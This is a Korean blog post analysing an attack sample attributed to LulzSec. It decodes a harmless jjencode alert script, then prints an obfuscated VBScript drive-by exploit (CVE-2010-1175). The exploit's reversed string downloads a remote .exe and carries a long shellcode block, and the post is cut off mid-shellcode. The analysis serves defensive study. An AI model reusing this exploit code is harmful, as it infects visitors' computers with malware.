한국 Lulzsec 공격 분석

1. 개요

한동안 스크립트 분석을 하지 않다 최근 lulzsec이 한국에서 활동한다는 소식을 접하고 관련 샘플을 찾아서 분석을 해봤습니다. 이 샘플이 그 샘플이 맞는지는 모르겠으나 허접하게 작성되었네요 -_-;

관련기사 : http://dailysecu.com/news_view.php?article_id=8208

2. jjencode 난독화 부분

우선 원본 코드 입니다. jjencode로 난독화 되어 있습니다.

$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"""+$.$_$_+(![]+"")[$._$_]+$.$$$_+""+$.__$+$.$$_+$._$_+$.__+"('"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"___"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"____"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"____\"+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"______/"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"\\__//"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"\\__/_____\\\"+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"_/"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"\\_/"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+":"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"//_____\\\\\"+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"/|"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+":"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+":"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+".."+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"/"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"\\\"+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"||"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"::"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"::"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"\\"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"/\"+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"||"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+":|"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"||"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"\\"+$.$__+$.___+""+$.$__+$.___+"\_____/\"+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"||"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"||"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"||"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"|\\"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"/"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"|\"+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"\\|"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"||"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"||"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"|"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"/"+$.$__+$.___+"|"+$.$__+$.___+""+$.$__+$.___+"\\\"+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"|"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"||"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"||"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"|"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"/"+$.$__+$.___+"/_\\"+$.$__+$.___+""+$.$__+$.___+"\\\"+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"|"+$.$__+$.___+"____"+$.$__+$.___+"||"+$.$__+$.___+"______"+$.$__+$.___+"||"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"|"+$.$__+$.___+""+$.$__+$.___+"/"+$.$__+$.___+""+$.$__+$.___+"/"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"\\\"+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"\\"+$.$__+$.___+"_-_"+$.$__+$.___+"/"+$.$__+$.___+"\\"+$.$__+$.___+"_-_-_"+$.$__+$.___+"/"+$.$__+$.___+"|"+$.$__+$.___+"______"+$.$__+$.___+"|/_/"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"\\\"+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"_\\_-_-_-_/"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"\\"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"/\"+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"/____"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"/\"+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"/"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"\\"+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"/\"+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"\\______\\_________"+$.$__+$.___+"/\"+$.__$+$.$_$+$.$$_+"\"+$.__$+$.$_$+$.$$_+"\"+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+""+$.$__+$.___+"');"+""")())();

난독화 되어 있는 코드를 디코딩 하면 아래와 같은 결과가 나옵니다.

alert('                         ___       ____       ____n             ______/      __//      __/_____n          _/      _/     :                     //_____\n         /|           :       :     ..           /              n         ||          ::             ::                         /n         ||          :|             ||              _____/n         ||          ||              ||            |     /   |n         |          ||              ||            |      / |  n           |          ||              ||           |    / /_  n           | ____ || ______ ||           |  /  /        n             _-_ /  _-_-_ / | ______ |/_/            n                                    __-_-_-_/                 /n                                  /____                          /n                                /                                 /n                                _______________ /nnn        ');

이 부분은 그냥 주먹 그림으로 추정되는 모양을 alert창을 띄우는 코드로 악성행위를 하진 않으며, 디코딩 방법은 아래 사이트에서 참고하시기 바랍니다.

jjencode 디코딩 참고 사이트 : http://www.kahusecurity.com/2013/jjencode-script-leads-to-drive-by/

3. vbs 난독화 부분 (CVE-2010-1175)

vbs 스크립트를 난독화 한 코드로 원본은 아래와 같습니다.

<SCRIPT language=vbscript>
wei="มี>lmth/<>ydob/<>naps/<>"")tneve(1ve""=daolno ""fig.mw""=CRS GMI<>""1ps""=di naps<มี>tpircs/<มีมี>tpircs/<มี}มี}++i;"" ""=sutats.wodniwมี{มี)01=<i(elihw;1=i ravมี;)'>NAPS/<>LMTH=SATAMROFATAD C=DLFATAD I#=CRSATAD NAPS<>LMX/<>I=DI LMX<>LMTH=SATAMROFATAD C=DLFATAD I#=CRSATAD NAPS<>lmx/<>X/<>C/<>]]>[ATADC[!<>]]""exe.88psa/moc.22kwfhs.88dsa//:ptth""=crs moc.koob.;411#&;0752#&;411#&//:ptth=CRS egami<[ATADC[!<>C<>X<>I=DI LMX<'(etirw.tnemucod)3k2w||pxw(fiมี;))1-=!)'px swodniw'(fOxedni.van(||)1-=!)'1.5 tn swodniw'(fOxedni.van((=pxwมี;))1-=!)'3002 swodniw'(fOxedni.van(||)1-=!)'2.5 tn swodniw'(fOxedni.van((=3k2wมี{มี)7==noisrev(fiมี}มี)]1[)'EISM'(tilps.noisreVppa.rotagivan(taolFesrap=noisrevมี{มี)1-=!)'EISM'(fOxedni.noisreVppa.rotagivan(fiมี;)(esaCrewoLot.tnegAresu.rotagivan=vanมีมี;)0003(peelsมีมี;)""1200gnodad1212gnodad1212gnodad1212gnodad1212gnodad1212gnodad1212gnodad1212gnodad1212gnodad1212gnodad1212gnodad1212gnodad1212gnodad1212gnodad1212gnodad1212gnodad1212gnodad1212gnodad1212gnodad1212gnodad1212gnodad1212gnodad1212gnodad1212gnodad1212gnodad1212gnodad1212gnodad1212gnodad1212gnodad1212gnodad1212gnodad1212gnodad1212gnodad1212gnodad1212gnodad1212gnodad1212gnodad1212gnodad1212gnodad1212gnodad1212gnodad1212gnodad1212gnodad1212gnodad1212gnodad1212gnodad1212gnodad1212gnodad9544gnodadF044gnodadA4E4gnodadF4E0gnodadE465gnodadE054gnodad24F4gnodad24F0gnodadA444gnodad0484gnodadF034gnodad6565gnodadE065gnodadB1E0gnodad5515gnodad9455gnodadEDEDgnodad74ADgnodad2E9CgnodadD304gnodad5650gnodad718Agnodad224Egnodad52AAgnodadF1AAgnodad22CFgnodadB7D3gnodadF1AAgnodadD2A6gnodadF1AAgnodadCF74gnodad5022gnodadAAB7gnodadEFF1gnodad9045gnodadD550gnodad71A1gnodadAC5Dgnodad229DgnodadEEC2gnodad620Egnodad1E55gnodadD85Agnodad1EDDgnodadED21gnodad4D21gnodadAA22gnodadAA51gnodad86F1gnodad2CA1gnodad22CFgnodadB710gnodadF1AAgnodadB693gnodadF1AAgnodad224Fgnodad4295gnodadAA57gnodadD171gnodadAA46gnodad5071gnodadD450gnodad71AAgnodad2E14gnodad16D1gnodadF1AAgnodad1ED5gnodad512AgnodadAA16gnodadA2F1gnodad2EACgnodad1692gnodadF1AAgnodadD3C8gnodadAA15gnodadD2F1gnodadAA16gnodad13F1gnodad1E95gnodad114AgnodadAA16gnodad1E54gnodad2E21gnodad5E92gnodad122Agnodad1212gnodad9CB0gnodadDC17gnodadF6F2gnodad94FAgnodad1212gnodadE212gnodad2E9Cgnodad5E92gnodad122Agnodad1212gnodad9CF1gnodad4217gnodadECE6gnodad94E6gnodadEDEDgnodad88CDgnodad2E9CgnodadEDEDgnodad9CEDgnodadED9CgnodadDDEDgnodad8C69gnodadEDEDgnodadA8FDgnodad179CgnodadEDEDgnodad6DADgnodad179CgnodadB444gnodadAC23gnodadEDEDgnodad56FDgnodad2E9Cgnodad5E92gnodad122Agnodad1212gnodad9C35gnodad7317gnodadFD29gnodad9435gnodad1212gnodad6712gnodad2E9Cgnodad5E92gnodad122Agnodad1212gnodad9C7Agnodad2917gnodad504Egnodad9494gnodadEDEDgnodad36FDgnodad2E9Cgnodad5E92gnodad122Agnodad1212gnodad9CBBgnodad2817gnodad8E3Cgnodad946BgnodadEDEDgnodad77FDgnodad2E9Cgnodad5E92gnodad122Agnodad1212gnodad9CF8gnodad5B17gnodadA711gnodad941CgnodadEDEDgnodadB4FDgnodad2E9Cgnodad5E92gnodad122Agnodad1212gnodad9C3Egnodad3217gnodadB5F3gnodad94B3gnodadEDEDgnodadF5FDgnodad2E9Cgnodad5E92gnodad122Agnodad1212gnodad9C7FgnodadA917gnodad1849gnodad9467gnodadEDEDgnodad3BFDgnodad2E9Cgnodad5E92gnodad122Agnodad1212gnodad9CBCgnodad4117gnodad8DA9gnodad94FBgnodad1212gnodadEE12gnodad2E9Cgnodad5E92gnodad122Agnodad1212gnodad9CFDgnodad2517gnodad9F3Cgnodad94F5gnodad1212gnodad2C12gnodad2E9Cgnodad5E92gnodad122Agnodad0212gnodad9C33gnodad3217gnodad6B0Agnodad9487gnodadEDEDgnodad68FDgnodad2E9Cgnodad5E92gnodad122Agnodad0212gnodad9C70gnodadF317gnodadF7ABgnodad94A8gnodadEDEDgnodad71EDgnodad2E9Cgnodad5E92gnodad122Agnodad0212gnodad9CB1gnodadAF17gnodad86C0gnodad9419gnodad1212gnodadE302gnodad2E9Cgnodad5E92gnodad122Agnodad0212gnodad9CF6gnodad1417gnodadFE1Cgnodad94ECgnodad1212gnodad2102gnodad2E9Cgnodad5E92gnodad122Agnodad0212gnodad9C34gnodadD317gnodad94AFgnodad9495gnodadEDEDgnodad6DFDgnodad2E9Cgnodad5E92gnodad122Agnodad0212gnodad9C75gnodadE717gnodadBA52gnodad941Dgnodad1212gnodadA702gnodad2E9Cgnodad5E92gnodad122Agnodad0212gnodad9CBAgnodad7117gnodad77ECgnodad94CCgnodad1212gnodadE402gnodad2E9Cgnodad5E92gnodad122Agnodad0212gnodad9CFBgnodadD517gnodadDDC2gnodad94B8gnodad1212gnodad2A02gnodad2E9Cgnodad5E92gnodad122Agnodad0212gnodad9C39gnodadD217gnodad6B22gnodad94DCgnodad1212gnodad6B02gnodad2E9Cgnodad5E92gnodad122Agnodad0212gnodad9C7Egnodad8517gnodad7E76gnodad94A3gnodad1212gnodadA802gnodad2E9Cgnodad5E52gnodadED2AgnodadEDEDgnodad9C7CgnodadEDEDgnodad36FDgnodad128Cgnodad0212gnodad9CB8gnodadED17gnodadCDEDgnodad9C3Agnodad5217gnodad5650gnodad43CAgnodad12ACgnodad6495gnodad9475gnodad922Egnodad2A5EgnodadEDEDgnodad7CEDgnodadED9CgnodadFDEDgnodad8C64gnodad1212gnodadEE02gnodad179CgnodadEDEDgnodad68CDgnodad179Cgnodad5052gnodadCA56gnodadAC43gnodad54E4gnodad2594gnodad1294gnodad7565gnodad9424gnodad922Egnodad2A5EgnodadEDEDgnodad7CEDgnodadED9CgnodadFDEDgnodad8C0Bgnodad1212gnodad8D02gnodad179CgnodadEDEDgnodad0FCDgnodad179Cgnodad5052gnodadCA56gnodadAC43gnodad4435gnodad4525gnodad1294gnodad3112gnodad9421gnodad922Egnodad2A5EgnodadEDEDgnodad7CEDgnodadED9CgnodadFDEDgnodad8CA9gnodad1212gnodad2032gnodad179CgnodadEDEDgnodadADCDgnodad179Cgnodad5052gnodadCA56gnodadAC43gnodad54D4gnodadF455gnodadD494gnodad2EB4gnodad5E92gnodadED2AgnodadEDEDgnodad9C7CgnodadEDEDgnodad3CFDgnodad128Cgnodad3212gnodad9CB6gnodadED17gnodadFDEDgnodad9C30gnodad5217gnodad5650gnodad43CAgnodadC4ACgnodad35D4gnodad9445gnodad1212gnodadE4F4gnodad2E94gnodad1212gnodad0212gnodadF799gnodad13E7gnodad2A5EgnodadED1Fgnodad1212gnodadEC02gnodadD39Cgnodad5550gnodadF1EDgnodadED12gnodad10F1gnodad5650gnodad71AAgnodad5592gnodadA19DgnodadED1Fgnodad1212gnodadAE02gnodad9D9Cgnodad1FAAgnodad12EDgnodad3212gnodad9C50gnodad5010gnodadED55gnodad12F1gnodadE0B4gnodad7845gnodad122Dgnodad1212gnodad8992gnodadAA5Dgnodad7635gnodad8646gnodad1294gnodadC444gnodad9404gnodadAADDgnodadED1Fgnodad1212gnodadC732gnodad539CgnodadED65gnodad67F1gnodadB492gnodadAADDgnodadDC92gnodad672AgnodadED77gnodadEDEDgnodad9C8Dgnodad972EgnodadAC32gnodadA72EgnodadF7E7gnodad1F97gnodad67EDgnodad21EDgnodad1212gnodadA232gnodadB29Cgnodad1265gnodadD150gnodad711AgnodadED1Fgnodad1212gnodad4732gnodad179Cgnodad1212gnodadF312gnodad579Cgnodad1E17gnodad7721gnodad2767gnodadEDEDgnodad9CFDgnodad1F9Cgnodad12EDgnodad1212gnodad94EDgnodad1212gnodadAD02gnodad1F9Cgnodad67EDgnodad21EDgnodad1212gnodad0632gnodadB29Cgnodad1265gnodadD150gnodad711AgnodadED1Fgnodad1212gnodadAA32gnodad179Cgnodad1212gnodad5712gnodad579Cgnodad1E17gnodadED21gnodadEDEDgnodad9CA3gnodadD212gnodad1A3Egnodad0252gnodad9903gnodadEDEDgnodad90EDgnodad2E9CgnodadEDEDgnodadF0EDgnodad1C9Cgnodad42EDgnodadCA16gnodadAADCgnodad7247gnodad1B55gnodad1B1Bgnodad421Bgnodad0A95gnodad45E2gnodad918Cgnodad9C1Agnodad1A91gnodadED1Fgnodad2727gnodad2727gnodad21AFgnodad1212gnodad6122gnodadED9CgnodadEDEDgnodad1814gnodad12CAgnodad1212gnodad0852gnodad1254gnodad1212gnodad9C83gnodad1212gnodad8122gnodad179Cgnodad1767gnodad1717gnodad1717gnodad2717gnodad1207gnodad1212gnodadD002gnodad6E26gnodad1EF1gnodad1321gnodad2A2EgnodadAA8FgnodadAADEgnodadAC3Dgnodad1E52gnodad022Agnodad8AD3gnodad82F1gnodad57C5gnodad2A9DgnodadAADEgnodad21AFgnodad211EgnodadDC57gnodad022Agnodad9A17gnodad3FF1gnodad3021gnodad7E12gnodad7DF1gnodad16ACgnodad5522gnodad5AAFgnodadBA93gnodad92F1gnodad2A1EgnodadAA6EgnodadAADDgnodadED1Fgnodad1212gnodad0E22gnodad179Cgnodad3727gnodad1212gnodad5202gnodad1794gnodad1E17gnodad9221gnodad2A3Egnodad1030gnodadE024gnodad3652gnodadF16Egnodad5410gnodad24C4gnodad6E32gnodad5FF1gnodad12AAgnodad0212gnodadDC53gnodadA70Agnodad1212gnodad4B52gnodad2E8CgnodadED1Cgnodad6642gnodadF16Egnodad0274gnodad8AE7gnodad99F1gnodad7E62gnodadA7F1gnodadE72Egnodad66EDgnodadF8CAgnodadDD3Dgnodad192Egnodad211Egnodad8E86gnodad9D21gnodad12AAgnodad5212gnodad9CD1gnodad2E67gnodad1297gnodad1212gnodad9CCEgnodad1212gnodad8B32gnodad679Cgnodad1212gnodad1213gnodad1094gnodad27B4gnodadAADFgnodad2E27gnodad1297gnodad1212gnodad9C4Cgnodad1212gnodad0932gnodad679Cgnodad1212gnodad1213gnodad1694gnodad27B4gnodadAADFgnodad9727gnodad12ACgnodad1212gnodad9CB3gnodad1212gnodad0402gnodad129Cgnod